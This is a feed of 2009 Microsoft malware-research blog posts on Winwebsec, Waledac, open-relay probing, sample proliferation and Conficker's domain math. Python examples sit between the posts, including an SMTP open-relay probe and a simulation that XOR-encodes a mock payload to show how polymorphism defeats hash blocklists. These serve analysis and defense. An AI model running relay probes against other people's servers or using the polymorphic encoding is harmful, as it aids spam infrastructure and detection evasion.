This month's addition to the Malicious Software Removal Tool (MSRT) is a rogue security program called Trojan:Win32/Winwebsec. In most ways Winwebsec is virtually the same as most other rogues. It is often distributed through fake online scanner web pages that have a very familiar look to anyone who has spent any time looking at rogues:

IMAGE
IMAGE

This web page is virtually identical to those used by other rogues like Trojan:Win32/FakeXPA and Trojan:Win32/WinSpywareProtect. It can't actually scan the machine; it's entirely fake. At the end of the "scan", or if you click anywhere on the page, it tries to load the trojan itself, which usually goes by the file name "install.exe". If allowed to run, this installs the rogue, which generally looks like this:

IMAGE

Winwebsec goes by different names ("System Security" and "Winweb Security"), which is also typical of a rogue. One less common feature is that it has been known to download additional malware. For a short time it downloaded Worm:Win32/Koobface, which we added to MSRT in March. This brings us full circle: one of the ways we have seen people directed to Win32/Winwebsec's fake online scanner is via Win32/Koobface. As Scott mentioned in his blog, Koobface can launch pop-ups which load fake online scanners. At one time it was FakeXPA, at another it was Win32/Winwebsec. Koobface doesn't seem attached to a specific rogue.

Some variants of Winwebsec try to block execution of particular programs. Instead of containing a list of programs to block, however, they contain a list of programs to allow:

alg.exe
csrss.exe
ctfmon.exe
explorer.exe
services.exe
slsvc.exe
smss.exe
spoolsv.exe
svchost.exe
system
iexplore.exe
lsass.exe
lsm.exe
nvsvc.exe
wininit.exe
winlogon.exe
wscntfy.exe
wuauclt.exe

Anything not on the list won't run. This is enough to let the system work (barely), but it obviously stops you from running tools that might help you remove Winwebsec (even cmd.exe and taskmgr.exe are blocked, for example). This "feature" serves a dual purpose, however: it is also another way to convince you that you need to pay money for the rogue:

IMAGE

-- Hamish O'Dea

IMAGE</description><link>http://www.secuobs.com/revue/news/96269.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/96269.shtml</guid></item>
<item><title>Where is Waledac - Episode II</title><description>Secuobs.com : 2009-05-08 07:52:23 - Microsoft Malware Protection Center -

The Spambot

Whilst Win32/Waledac is probably best known for its ability to send spam, it can also download and execute arbitrary files. In addition to using this downloading mechanism to update itself, Waledac can also download other malware. The MMPC has observed the download of Trojan:Win32/FakeSpypro and TrojanDownloader:Win32/Rugzip variants. Downloading and executing arbitrary files is not confined to malicious software: Waledac also attempts to download and install a version of the freely available packet capturing library "WinPcap". This spambot leverages the capability of the library to "sniff" network traffic, searching for credentials being transmitted as part of the SMTP, POP, HTTP and FTP protocols.

In addition to what we mentioned in the previous blog, that Waledac has been downloaded by variants of Win32/Bredolab, we have also seen Waledac being downloaded by Win32/Cutwail in the wild. Interestingly, the MMPC has recently identified Win32/Cutwail variants downloading the same rogue as Win32/Waledac, Win32/FakeSpypro (below is the skin of the FakeSpypro rogue). Another piece of information about all things underground economy.

IMAGE

The Telemetry

Now let's take a look at the MSRT telemetry after Waledac was added to MSRT in April. Waledac is the #24 most prevalent thre­at family this month. More than 20,000 distinct machines were detected with Waledac infection worldwide. The criminals behind Waledac seem to enjoy having the deployment mostly on XP. Note this is not normalized: as of today the MSRT install base on Vista is about 37% the size of that on XP.

IMAGE

Factoring in the install base, we came up with the following table of infection rate, or computers cleaned per thousand MSRT executions (CCM), the metric widely used in the Microsoft Security Intelligence Report. This table presents the top 25 Waledac infected countries, sorted by CCM. Turkey has the highest infection rate, followed by Hungary, Switzerland and Australia.

Top 25 Infected Countries - Sorted by CCM

Country | Infected Machines | MSRT Executions | CCM
Turkey | 773 | 2,789,140 | 0.277
Hungary | 184 | 1,204,140 | 0.153
Switzerland | 97 | 808,880 | 0.120
Australia | 257 | 2,266,060 | 0.113
Russia | 474 | 4,435,200 | 0.107
United States | 10,788 | 102,158,300 | 0.106
Norway | 145 | 1,600,720 | 0.091
Canada | 336 | 3,882,660 | 0.087
Poland | 381 | 4,413,260 | 0.086
Finland | 113 | 1,465,140 | 0.077
Belgium | 93 | 1,311,660 | 0.071
Netherlands | 384 | 5,632,000 | 0.068
Sweden | 197 | 2,890,140 | 0.068
Czech Republic | 132 | 1,995,920 | 0.066
Portugal | 105 | 1,674,600 | 0.063
Mexico | 136 | 2,226,740 | 0.061
United Kingdom | 621 | 10,570,440 | 0.059
Denmark | 113 | 1,984,000 | 0.057
France | 752 | 14,528,900 | 0.052
Spain | 443 | 10,767,540 | 0.041
Brazil | 294 | 7,481,920 | 0.039
Korea | 294 | 8,333,660 | 0.035
Italy | 208 | 7,530,060 | 0.028
Japan | 563 | 21,683,600 | 0.026
Germany | 291 | 16,958,320 | 0.017

The Spam Data

The MMPC and the Forefront Online Service for Exchange (FOSE) conducted some research on Waledac related spam. In this study we included the following subset of Waledac owned domains and monitored the spam emails between 4/15 and 4/23:

* chinamoilesms.com
* coralarmor.com
* freeservesms.com
* miosmsclu.com
* smsclunet.com
* smspianeta.com

From these domains we identified the related IPs and counted the emails sent from those IPs. Over the course of the study, we observed a total of 7,199 distinct IPs sending spam from Waledac. We observed 4,091,725 spam emails distributed by these IPs during the seven days. Non-Delivery Reports (NDR) are not counted as spam email in this study. Note this is not even the peak of a Waledac email campaign.

Date | Sum of Spam | Sum of NDR | Distinct IPs
4/15/2009 | 520,423 | 272,050 | 2,430
4/16/2009 | 606,171 | 329,552 | 3,673
4/17/2009 | 588,710 | 322,779 | 2,802
4/18/2009 | 516,215 | 281,225 | 2,697
4/19/2009 | 514,375 | 242,666 | 2,222
4/20/2009 | 660,828 | 285,473 | 2,450
4/21/2009 | 685,003 | 293,193 | 1,760
Grand Total | 4,091,725 | 2,026,938 | 18,034*

* 18,034 is the cumulative sum of the daily counts; the number of distinct IPs over the whole period is 7,199.

The location of the senders of this spam does not necessarily match the geo distribution chart of the MMPC Waledac detections. The controllers of Waledac can decide which zombies will be throttled or heavily loaded. Furthermore, they can rotate these IPs in and out and need not have them all active simultaneously.

Country | Number IPs | Total Spam | Avg Mail per IP
United States | 7,582 | 3,143,793 | 1,424.2
China | 1,492 | 3,475 | 7.2
South Korea | 900 | 3,276 | 5.0
Great Britain | 827 | 158,026 | 589.7
Japan | 672 | 97,309 | 293.2
Germany | 462 | 74,556 | 477.5
Brazil | 445 | 6,978 | 54.4
Canada | 365 | 77,042 | 734.3
Australia | 342 | 15,754 | 225.4
France | 340 | 226,215 | 1,355.3
Russia | 309 | 1,815 | 16.0
The Netherlands | 286 | 11,066 | 243.2
Italy | 258 | 17,601 | 137.2
Taiwan | 233 | - | -
Unknown | 227 | 8,700 | 54.1
Argentina | 213 | 7,382 | 66.7
Spain | 175 | 19,081 | 134.7
Czech Republic | 170 | 1,656 | 164.4
Poland | 165 | 1,517 | 36.7
Turkey | 158 | 1,293 | 8.4
India | 155 | 5,179 | 72.2
Romania | 123 | 1,092 | 15.5
Singapore | 112 | 7,724 | 300.4
Austria | 101 | 2,061 | 237.2
All others | 1,922 | 199,134 | 248.7
Grand Total | 18,034 | 4,091,725 | 737.1

We will continue to monitor the Waledac threats and the spam activities.

Scott Wu - MMPC
Terry Zink - FOSE
Scott Molenkamp - MMPC

IMAGE</description><link>http://www.secuobs.com/revue/news/93482.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/93482.shtml</guid></item>
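The CCM table above is easy to recompute, and doing so makes the post's normalization point concrete: the United States has by far the most infected machines but only the sixth-highest rate, and Turkey is first by rate yet second by count. The Python below is an added example, not code from the post. It encodes the 25 rows as listed, derives the CCM column from infected machines and MSRT executions, and ranks the countries both ways. The data is the post's own; the helper names are this example's.

```python
# (country, infected machines, MSRT executions) for the post's top 25, as listed.
WALEDAC_TOP25 = [
    ("Turkey", 773, 2_789_140), ("Hungary", 184, 1_204_140),
    ("Switzerland", 97, 808_880), ("Australia", 257, 2_266_060),
    ("Russia", 474, 4_435_200), ("United States", 10_788, 102_158_300),
    ("Norway", 145, 1_600_720), ("Canada", 336, 3_882_660),
    ("Poland", 381, 4_413_260), ("Finland", 113, 1_465_140),
    ("Belgium", 93, 1_311_660), ("Netherlands", 384, 5_632_000),
    ("Sweden", 197, 2_890_140), ("Czech Republic", 132, 1_995_920),
    ("Portugal", 105, 1_674_600), ("Mexico", 136, 2_226_740),
    ("United Kingdom", 621, 10_570_440), ("Denmark", 113, 1_984_000),
    ("France", 752, 14_528_900), ("Spain", 443, 10_767_540),
    ("Brazil", 294, 7_481_920), ("Korea", 294, 8_333_660),
    ("Italy", 208, 7_530_060), ("Japan", 563, 21_683_600),
    ("Germany", 291, 16_958_320),
]


def ccm(infected, executions):
    """Computers cleaned per thousand MSRT executions (the SIR's CCM metric)."""
    return infected / executions * 1000


def ccm_table(rows):
    """Rebuild the post's table: rows sorted by rate, CCM rounded to three places."""
    ordered = sorted(rows, key=lambda r: ccm(r[1], r[2]), reverse=True)
    return [(country, infected, executions, round(ccm(infected, executions), 3))
            for country, infected, executions in ordered]


def rank_by_count(rows):
    """Countries ordered by raw infected-machine counts, which favours big install bases."""
    return [r[0] for r in sorted(rows, key=lambda r: r[1], reverse=True)]


def rank_by_ccm(rows):
    """Countries ordered by infection rate, the comparison the post's table makes."""
    return [r[0] for r in ccm_table(rows)]


def rank_of(country, ranking):
    """1-based position of a country in a ranking list."""
    return ranking.index(country) + 1


if __name__ == "__main__":
    for row in ccm_table(WALEDAC_TOP25):
        print("%-16s %6d %12d %6.3f" % row)
    print("US by count:", rank_of("United States", rank_by_count(WALEDAC_TOP25)),
          "US by CCM:", rank_of("United States", rank_by_ccm(WALEDAC_TOP25)))
```

The sort uses the unrounded rate, which is why the Netherlands stays ahead of Sweden although both print as 0.068.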
<item><title>Closing In on Open Relay Mail Servers</title><description>Secuobs.com : 2009-05-06 03:39:50 - Microsoft Malware Protection Center -

About four months ago some new colleagues in the security business arrived in our Dublin office. They are part of the Microsoft Anti-spam team and it is our pleasure to have them here :)

The Dublin Spam team recently told us that almost every week, Microsoft Forefront Online Security for Exchange is filtering a whopping 13 billion spam messages. Most of them (around 95%) are automatically blocked because they are sent from computers listed in blacklists.

Date | Total number of messages | Non-spam messages | Spam messages
Mar 2 - Mar 8 | 14,573,035,329 | 305,930,377 | 14,267,104,952
Mar 9 - Mar 15 | 13,407,338,885 | 316,179,479 | 13,091,159,406
Mar 16 - Mar 22 | 12,946,498,410 | 308,336,934 | 12,638,161,476
Mar 23 - Mar 29 | 13,505,537,445 | 307,332,413 | 13,198,205,032
Mar 30 - Apr 5 | 14,928,945,154 | 316,407,069 | 14,612,538,085
Apr 6 - Apr 12 | 13,389,657,751 | 291,404,668 | 13,098,253,083

Of the remaining messages, those coming from computers not listed in a blacklist of known spammers, another 30% are flagged as spam by various filters and rules. That's a staggering amount: one in three messages sent to you from supposedly clean systems is spam, but thanks to the work done by the Anti-spam team, it doesn't clog your inbox.

Now, probably you remember (or not) our blog entries about our honeypot (part 1 and part 2). We've also installed a fake open-relay mail server, and today we're going to show you some of the things that we've received. In the past few months our honeypot received probes from more than 60 independent computers that are used by various automated systems to actively search for badly configured mail servers.

Spammers are always on the lookout for ways of expanding their capability to send spam messages, perhaps contracting bot-herders that control a number of infected machines capable of sending a massive amount of spam for their campaign. Now, a server won't be added so easily to the spammer's network. Probe e-mails are sent a couple of times to check the viability of the target mail server (for example, to ensure that the target mail server is active and has not been reconfigured). The probe e-mails we've received usually have the following format:

Sender:
Receiver:

For easier verification, the subject usually contains a way to identify the scanned computer, for example:

Subject: BC_

or

Subject: Super webscan open relay check succeded, hostname =

Country/Region | No of probe e-mail templates
Taiwan | 116
Russia | 5
United States | 3
European Union | 1

Another interesting thing is that spammers are also using various free web mail services in their probes. After a short check of these IPs we found just a few of them listed in our database as known spam senders. Of course some of those that aren't listed belong to various web mail services, but the others are probably part of a botnet/spam network and are used only for various scans (possibly for "reconnaissance" attempts) and not for sending spam.

Using an open relay mail server is an integral part of the spam campaign. A spam message can try to sell you an untrustworthy product, but more seriously it can lead to a phishing scam, or might contain links that point to malicious files. To make sure that your Microsoft Exchange Server is not configured as an open mail relay, you can read Microsoft KB Article 895853.

With our efforts combined, Microsoft's Anti-malware and Anti-spam teams are actively working on mitigating these attacks.

Special thanks to Kai Yu from the Dublin Anti-spam Team, and Andrei Florin Saygo and Jireh Sanico from the Dublin Anti-malware Team.

- MMPC Dublin
- Dublin Anti-spam Team

IMAGE</description><link>http://www.secuobs.com/revue/news/92425.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/92425.shtml</guid></item>
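The rule the probes above are testing can be written down in a few lines. The Python below is an added example, not part of the MMPC post and not Exchange's own configuration: open_relay is the misconfiguration (every RCPT TO is accepted), hardened_relay accepts a foreign recipient only from an authenticated client or a trusted network, and relay_probe replays the scanner's outside-sender-to-outside-recipient test against either policy, reporting whether the message would have been carried. The local domain, the trusted network, the client address and the probe addresses are constructed for the example; check_live_server runs the same probe against a real server with smtplib and is the only part that touches the network.

```python
import ipaddress
import smtplib

# Constructed configuration (assumed, not from the post).
LOCAL_DOMAINS = {"example.com"}
TRUSTED_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]

ACCEPT = (250, "2.1.5 Recipient OK")
DENY = (550, "5.7.1 Unable to relay")


def open_relay(client_ip, authenticated, rcpt_to):
    """The misconfiguration: every recipient is accepted, so strangers can relay through us."""
    return ACCEPT


def hardened_relay(client_ip, authenticated, rcpt_to):
    """Relay mail for our own domains from anyone; anything else only for authenticated or trusted clients."""
    domain = rcpt_to.rpartition("@")[2].lower()
    if domain in LOCAL_DOMAINS:
        return ACCEPT
    client = ipaddress.ip_address(client_ip)
    if authenticated or any(client in net for net in TRUSTED_NETWORKS):
        return ACCEPT
    return DENY


def relay_probe(policy, client_ip="203.0.113.45", scanned_host="mail.example.com"):
    """
    Replay the scanner's probe: unauthenticated outside client, outside sender, outside
    recipient. Returns (relayed, transcript). A 2xx reply to RCPT TO means the server would
    carry the message and can be added to the spammer's relay list.
    """
    sender = "probe@relaycheck.invalid"
    rcpt = "collector@relaycheck.invalid"
    transcript = [("MAIL FROM", sender, 250)]
    code, _text = policy(client_ip, False, rcpt)
    transcript.append(("RCPT TO", rcpt, code))
    relayed = code // 100 == 2
    if relayed:
        # Subject format quoted in the post: lets the scanner tie the delivered copy to the host it probed.
        subject = "Super webscan open relay check succeded, hostname = " + scanned_host
        transcript.append(("DATA", "Subject: " + subject, 250))
    return relayed, transcript


def check_live_server(host, port=25, timeout=10):
    """Run the same probe against a real server you own; True means it relays for strangers."""
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.ehlo()
        smtp.mail("probe@relaycheck.invalid")
        code, _msg = smtp.rcpt("collector@relaycheck.invalid")
        smtp.rset()  # never send the message; only the reply code matters
        return code // 100 == 2
```

Only run check_live_server against servers you are responsible for; from the outside it is indistinguishable from the scans the post describes.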
<item><title>MSRT and an Update of Worms in the Wild</title><description>Secuobs.com : 2009-05-05 08:22:34 - Microsoft Malware Protection Center -

On April 14th, Microsoft released the latest update to the Microsoft Malicious Software Removal Tool. This month, as you know from Scott Molenkamp's blog post, we added Win32/Waledac. In fact, of the top 5 families, worms make up 3 of the slots: Win32/Taterf, Win32/Frethog, and Win32/Koobface.

Family Name | Report Count
Taterf | 1,166,975
Frethog | 390,967
Alureon | 328,554
Koobface | 142,164
Cutwail | 134,549

Worm:Win32/Koobface has actually moved up one slot to #4 from last month's telemetry update. Jeff Williams has described the industry approach to dealing with this type of threat in his blog entry. Worm:Win32/Taterf is at the top of the list for prevalence; Matt McCormack discussed this threat in greater detail in a blog post.

There are a lot of worms out there on the Internet, so be careful out there: make sure to keep your antimalware software up to date, don't run programs you don't trust, run with an up to date firewall, and keep up to date with both application and operating system updates.

-- Jeremy Croy

IMAGE</description><link>http://www.secuobs.com/revue/news/92072.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/92072.shtml</guid></item>
<item><title>Protecting Our Customers From Half a Million New Unique Malicious Files Every Day</title><description>Secuobs.com : 2009-05-01 01:11:01 - Microsoft Malware Protection Center -

You might find it hard to believe, but that's the number of new unique malware samples we detect on average every day in the wild. During the second half of 2008 our products detected a total of nearly 95 million unique malicious files. The total number of distinct malware files we detect every day in the wild is even higher: 841 thousand unique files (the daily average over 2H08); however, malware is often detected during consecutive days or even longer. Half a million is the daily average of new unique samples detected during 2H08.

These numbers are huge. However, we need to remember that there are a couple of reasons that contribute to this huge malware proliferation. Here are some of them:

* Virus infections - One virus can infect many different files, and each one of them can then infect more files. While they all stem from the same virus, hash-wise all these infected files are different.
* Polymorphism - There are several scenarios here. For example, in server side polymorphism the server provides a slightly modified copy of the malware each time. Therefore when a thousand users connect to that server, they'll likely get a thousand different copies of the malware, but all these copies basically share the same functionality. Another scenario is polymorphism that happens during malware replication: when malware spawns a new copy, that new copy might be a slight modification of the original one, yielding a high number of unique copies. Often many of these replicated samples are corrupted and cannot execute at all. But note that in all the statistics here, we did not include counts of known damaged files.

The Microsoft Security Intelligence Report (SIR) Volume 6, which we released this month, includes more details. For example, here is the total number of unique samples we detected during the second half of 2008, broken down by category:

Figure 55 from SIR v6: Number of new unique samples broken down by category

Quite expectedly, the most common malware samples are files that got infected by viruses, for the reason explained above. Yet the numbers for the other categories are high as well. Over 16 million unique trojans, 5.5 million malicious downloaders and droppers, and nearly a million unique exploit files were detected. Here's the monthly trend:

Figure 56 with the monthly trends by category

Many of the trojans are used as part of rogue security software. In particular, we started removing these trojans with the MSRT in December in addition to blocking them with our other products. These trojans use server-side polymorphism, and that explains the spike we see in the number of trojan samples in December. During that month, we detected nearly a million new unique samples of the Win32/FakeXPA trojans. In contrast to malware, spyware and Potentially Unwanted Software usually do not use these tricks to evade detection and their number of samples is comparatively low. Yet they still affect a large number of users. See the SIR and the following blog post for details.

Here are the malware families that had the highest number of samples in 2H08. First, two families of viruses show:

Figure 57 with the families that have the highest number of samples

And then other malware families follow (some of them are viruses as well):

Figure 57 (cont.) with the families that have the highest number of samples

Overall, these numbers show that any attempt to block malware by maintaining lists of bad hashes is doomed to fail. Security vendors should focus on generic and heuristic signatures to maintain effective protection against malware proliferation.

For more information, please see the "Trends in Sample Proliferation" section in the most recent SIR.

Joe Faulhaber and Ziv Mador
Microsoft Malware Protection Center

IMAGE</description><link>http://www.secuobs.com/revue/news/90787.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/90787.shtml</guid></item>
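To see why the post's conclusion follows, here is an added Python simulation (not code from the post or from Microsoft) of the server-side polymorphism it describes. A constructed payload is served a thousand times, each copy XOR-encoded with a fresh key and padded with random bytes, so every download has a different hash. A hash blocklist built from the first download catches nothing else, while a generic signature that keys on the unchanged decoder stub, decodes the body and checks for the payload's invariant string catches every copy. The stub bytes, the payload and the keying scheme are stand-ins assumed for the example.

```python
import hashlib
import random

# Stand-in for the decoder every variant keeps unchanged: pushad; call $+5; pop ebx,
# a common x86 get-PC prologue. Assumed for the example, not taken from a real sample.
DECODER_STUB = b"\x60\xe8\x00\x00\x00\x00\x5b"
# Constructed invariant payload; real malware keeps e.g. its download URL or C2 logic.
PAYLOAD = b"http://fake-scanner.invalid/install.exe"


def serve_variant(rng):
    """Server-side polymorphism: fresh XOR key and junk tail for every download."""
    key = rng.randrange(1, 256)
    body = bytes(b ^ key for b in PAYLOAD)
    junk = bytes(rng.getrandbits(8) for _ in range(rng.randrange(16, 64)))
    return DECODER_STUB + bytes([key]) + body + junk


def hash_blocklist_hit(sample, blocklist):
    """Hash-based blocking: matches only byte-identical files."""
    return hashlib.sha256(sample).hexdigest() in blocklist


def generic_signature_hit(sample):
    """Generic signature: find the stub, read the key after it, decode, match the invariant."""
    pos = sample.find(DECODER_STUB)
    if pos == -1 or len(sample) == pos + len(DECODER_STUB):
        return False
    key_pos = pos + len(DECODER_STUB)
    key = sample[key_pos]
    decoded = bytes(b ^ key for b in sample[key_pos + 1:])
    return PAYLOAD in decoded


def simulate(downloads=1000, seed=1):
    """Serve `downloads` copies and count what each detection approach catches."""
    rng = random.Random(seed)
    samples = [serve_variant(rng) for _ in range(downloads)]
    blocklist = {hashlib.sha256(samples[0]).hexdigest()}  # the one copy we happened to see
    return {
        "distinct_hashes": len({hashlib.sha256(s).hexdigest() for s in samples}),
        "hash_hits": sum(hash_blocklist_hit(s, blocklist) for s in samples),
        "generic_hits": sum(generic_signature_hit(s) for s in samples),
    }


if __name__ == "__main__":
    print(simulate())
```

A real generic signature would emulate or unpack rather than assume a one-byte key, but the economics are the same: the attacker pays nothing per extra hash, while the defender's generic rule costs the same whether it sees one copy or a million.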
<item><title>Birthday Problem and Conficker</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center -

Hide behind huge numbers, making the fight against you very expensive

The Birthday problem (or paradox) is the probability that, from a given set of people, two of them will have the same birthday. It is a paradox because the result defies common sense: for a group of 23 people, the chance that two of them share the same birthday is greater than 50%, and for a group of 57 people it is higher than 99%.

The best known use of the Birthday paradox is probably the cryptographic attack known as the Birthday Attack. This attack exploits the math behind the Birthday Paradox by looking for collisions in a small set, which has a much higher collision chance than expected.

Recently I came across a different use of the same paradox, in what else than the infamous Conficker. Here, the use of this statistical paradox is different, with the purpose of making the fight against this worm much harder.

Here is the problem explained: each day, they have a pool of 50,000 pseudorandomly generated URLs, out of which any infected computer randomly chooses 500. The total number of possible draws is huge. It actually has 1,215 digits in decimal representation and people will find it hard even to imagine it. Just for the fun of it, I annexed the number to the end of my post. However, as you will see, in practice things work on a much smaller scale.

Registering all of them is an incredibly challenging task, and here lies the power of the aforementioned statistical problem. The problem here is to find the probability that a random group of 500 URLs contains at least one out of a smaller set. I will refer to such cases from here on as hits. And the result is amazing: if one registers 50 URLs, the chance to hit is 39.514%, and if one registers 500 URLs the chance to hit becomes 99.359%. That is, with only 1% of the pool registered, one can achieve more than a 99% success rate in spreading new malware content using Conficker.

The graph of hit chance is here:

IMAGE

On the horizontal axis we have the number of registered URLs and on the vertical axis we have the chance that any random draw will hit at least one of them, or in other words, the chance that a computer infected with Conficker will access one of these URLs.

This shows the importance of blocking as many of the 50,000 URLs as possible. A single missed URL that happens to be registered for malicious purposes gets a 1% chance to spread malware to Conficker infected machines. Randomly blocking some of the URLs has limited benefits, since the pool size is fairly big and the number of URLs potentially used by the malware is relatively small (at least two orders of magnitude).

Even if the above statement is true, there are some particularities that may help overcome these facts. The domains have to be registered through a limited number of registrars, based on their TLD. By working with the registrars directly, blocking large numbers of domains in bulk becomes less of a problem than Conficker's authors had foreseen, and with all the attention this thing is getting, people are willing to put in a lot of work to see this threat over.

The "good guys" may also use this paradox to their own advantage. It may give a means of estimating the real size of the "infection" in the world. By registering a limited number of URLs, one can monitor the incoming requests, and knowing the chance that a URL is picked, one can extrapolate to the number of infected machines.

Appendix 1 - Mathematical reasoning behind the numbers I've presented here

Let's denote by C(n,k) the number of combinations of size k chosen from a set S of n elements. Our problem is to determine the probability that a randomly chosen set hits at least one element from a smaller subset of S. Let m be the number of elements in that smaller set M (M is a subset of S, with Card(M) = m). The total number of possible k-sized sets out of S is C(n,k).

In order to see how many of them contain at least one element from M, we first check its complement, that is, the number of k-sets that do not contain an element from M. It is obvious that to have such sets, m has to be smaller than or equal to n - k. In other words, if m is greater than n - k, there is no possible choice of k-sets that do not contain elements from M. If m is smaller than n - k and we subtract M from S (S \ M), we get a subset of S, denoted by S', that has n - m elements. It is clear that all k-sets from S that do not contain elements from M are also k-sets of S', and all k-sets of S' are also k-sets of S, so the two collections are the same. Thus the number of k-sets from S that do not contain elements from M is equal to the number of k-sets from S', which is C(n-m,k).

As a direct result, the number of k-sets from S containing at least one element from M is C(n,k) - C(n-m,k). In order to compute the probability we divide this number by the total number of sets. We get P(m) = 1 - C(n-m,k)/C(n,k). If we break this down we get to

IMAGE

As we see, the second term is a product of sub-unitary numbers, which decreases towards 0 as we increase the number of elements m. As a matter of fact, each factor in the product is smaller than the first one, (n-k)/n (trivial to prove under the assumption 1 ≤ j ≤ m ≤ n-k), resulting in the following approximation,

IMAGE

which approaches 0 faster than an exponential. This means that our probability can be approximated with the following formula:

IMAGE

Another debate may be started around the fact that Conficker doesn't check for duplicates when picking the 500 URLs. To take this into account, we have to estimate the average number of duplicates in a randomly picked set of 500 out of the 50,000 possible choices. A collision counting formula may be found at "Collision counting formula". Applying the formula to our case gives an estimate of 2.4867 duplicates in any random draw. To take this into account, we have to redo the previous calculations with 497 instead of 500, but this doesn't induce a notable difference in the results.

Another approach to the same argument is to take into account the number of combinations with repetitions, rather than the number of combinations. This changes the above formulas to use C(n+k-1,k) instead of C(n,k) (combinations with repetitions). With the substitution n' = n + k - 1 we get to the same formulas, but with n' used in place of n. The differences in the numbers above are insignificant, and this is true for similar cases: n much bigger in comparison with k.

Appendix 2 - Here is a table showing the probabilities of getting a hit for up to 100 URLs. The values are computed with the exact formula, not using the approximation, but in most cases, especially with large numbers, the estimation gives a pretty good idea.

#Chosen URLs | Chance to hit | #Chosen URLs | Chance to hit | #Chosen URLs | Chance to hit | #Chosen URLs | Chance to hit
1 | 1.00% | 26 | 23.00% | 51 | 40.12% | 76 | 53.44%
2 | 1.99% | 27 | 23.77% | 52 | 40.72% | 77 | 53.91%
3 | 2.97% | 28 | 24.53% | 53 | 41.31% | 78 | 54.37%
4 | 3.94% | 29 | 25.29% | 54 | 41.90% | 79 | 54.82%
5 | 4.90% | 30 | 26.04% | 55 | 42.48% | 80 | 55.28%
6 | 5.85% | 31 | 26.78% | 56 | 43.06% | 81 | 55.72%
7 | 6.79% | 32 | 27.51% | 57 | 43.63% | 82 | 56.17%
8 | 7.73% | 33 | 28.23% | 58 | 44.19% | 83 | 56.61%
9 | 8.65% | 34 | 28.95% | 59 | 44.75% | 84 | 57.04%
10 | 9.56% | 35 | 29.66% | 60 | 45.30% | 85 | 57.47%
11 | 10.47% | 36 | 30.37% | 61 | 45.85% | 86 | 57.90%
12 | 11.36% | 37 | 31.06% | 62 | 46.39% | 87 | 58.32%
13 | 12.25% | 38 | 31.75% | 63 | 46.93% | 88 | 58.74%
14 | 13.13% | 39 | 32.44% | 64 | 47.46% | 89 | 59.15%
15 | 14.00% | 40 | 33.11% | 65 | 47.99% | 90 | 59.56%
16 | 14.86% | 41 | 33.78% | 66 | 48.51% | 91 | 59.96%
17 | 15.71% | 42 | 34.45% | 67 | 49.02% | 92 | 60.37%
18 | 16.55% | 43 | 35.10% | 68 | 49.53% | 93 | 60.76%
19 | 17.39% | 44 | 35.75% | 69 | 50.04% | 94 | 61.16%
20 | 18.21% | 45 | 36.39% | 70 | 50.54% | 95 | 61.55%
21 | 19.03% | 46 | 37.03% | 71 | 51.04% | 96 | 61.93%
22 | 19.84% | 47 | 37.66% | 72 | 51.53% | 97 | 62.31%
23 | 20.64% | 48 | 38.29% | 73 | 52.01% | 98 | 62.69%
24 | 21.44% | 49 | 38.90% | 74 | 52.49% | 99 | 63.06%
25 | 22.22% | 50 | 39.51% | 75 | 52.97% | 100 | 63.43%

Appendix 3 - Number of 500 sized groups out of a pool of 50,000:

204,834,213,151,168,214,461,654,141,379,130,974,442,702,258,579,159,760,519,079,012,459,387,176,802,787,506,861,786,508,179,331,441,121,439,711,042,255,209,315,604,421,328,946,422,708,973,054,967,511,463,454,539,076,329,708,371,835,003,639,384,418,663,768,257,135,542,695,566,118,398,524,969,107,678,840,406,278,808,768,917,987,669,580,920,601,539,854,184,448,084,968,926,599,909,629,237,703,403,693,367,099,024,184,779,484,619,888,559,300,860,309,406,196,851,763,668,717,714,332,015,184,499,781,085,279,838,674,767,933,215,516,613,767,486,445,885,103,234,075,164,696,519,772,065,511,437,536,446,581,389,706,964,561,561,630,111,372,422,588,407,655,472,487,156,160,979,442,796,737,751,214,470,874,983,713,716,166,016,097,542,640,445,995,015,124,162,692,362,933,579,204,387,223,639,162,341,095,056,558,194,384,376,095,685,557,088,871,687,075,022,514,166,924,615,039,210,753,372,304,959,038,121,674,413,419,287,592,963,128,974,892,289,843,707,783,982,076,564,230,128,288,660,514,687,421,957,578,018,027,099,724,820,158,186,441,086,224,228,396,845,701,885,741,875,315,754,256,285,000,948,322,222,787,948,002,673,558,400,910,506,477,079,314,973,748,069,999,035,196,658,450,861,075,755,112,300,624,257,908,109,473,126,745,582,249,777,744,799,202,563,038,549,934,781,898,593,761,740,878,642,558,088,366,365,761,869,077,984,254,942,611,411,570,900,277,727,137,416,203,980,580,420,283,292,933,330,096,057,462,249,072,976,977,887,327,330,947,186,730,927,061,671,007,370,705,441,238,632,455,277,914,656,553,937,760,943,654,927,229,770,344,284,531,443,702,460,460,473,920,711,298,545,759,340,018,169,550,420,491,173,318,117,302,400

-- Dan Nicolescu

IMAGE</description><link>http://www.secuobs.com/revue/news/89801.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89801.shtml</guid></item>
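The numbers in the post and in Appendix 2 can be reproduced from the closed form in Appendix 1. The Python below is an added example, not the author's code. It evaluates P(m) = 1 - C(n-m,k)/C(n,k) exactly with Python's arbitrary-precision integers, the bound 1 - (1 - k/n)^m that the approximation argument yields, the expected number of duplicate picks in a draw with replacement, and the sinkhole estimate the last paragraph describes (distinct hosts seen at the registered URLs divided by the chance that one bot hits any of them). The pool and draw sizes are the post's; the function names and the sinkhole input are this example's.

```python
import math

POOL = 50_000   # pseudorandom URLs generated per day
DRAW = 500      # URLs each infected machine tries


def hit_probability(m, n=POOL, k=DRAW):
    """Exact chance that a random k-subset of n meets at least one of m registered URLs."""
    if m > n - k:
        return 1.0          # no k-set can avoid M once M is larger than n - k
    return 1 - math.comb(n - m, k) / math.comb(n, k)


def hit_probability_bound(m, n=POOL, k=DRAW):
    """Each factor (n-k-j)/(n-j) of C(n-m,k)/C(n,k) is at most (n-k)/n, so P(m) is at least this."""
    return 1 - (1 - k / n) ** m


def expected_duplicates(n=POOL, k=DRAW):
    """Expected repeated picks when k URLs are drawn with replacement from n."""
    return k - n * (1 - (1 - 1 / n) ** k)


def estimate_infected(distinct_hosts_seen, m, n=POOL, k=DRAW):
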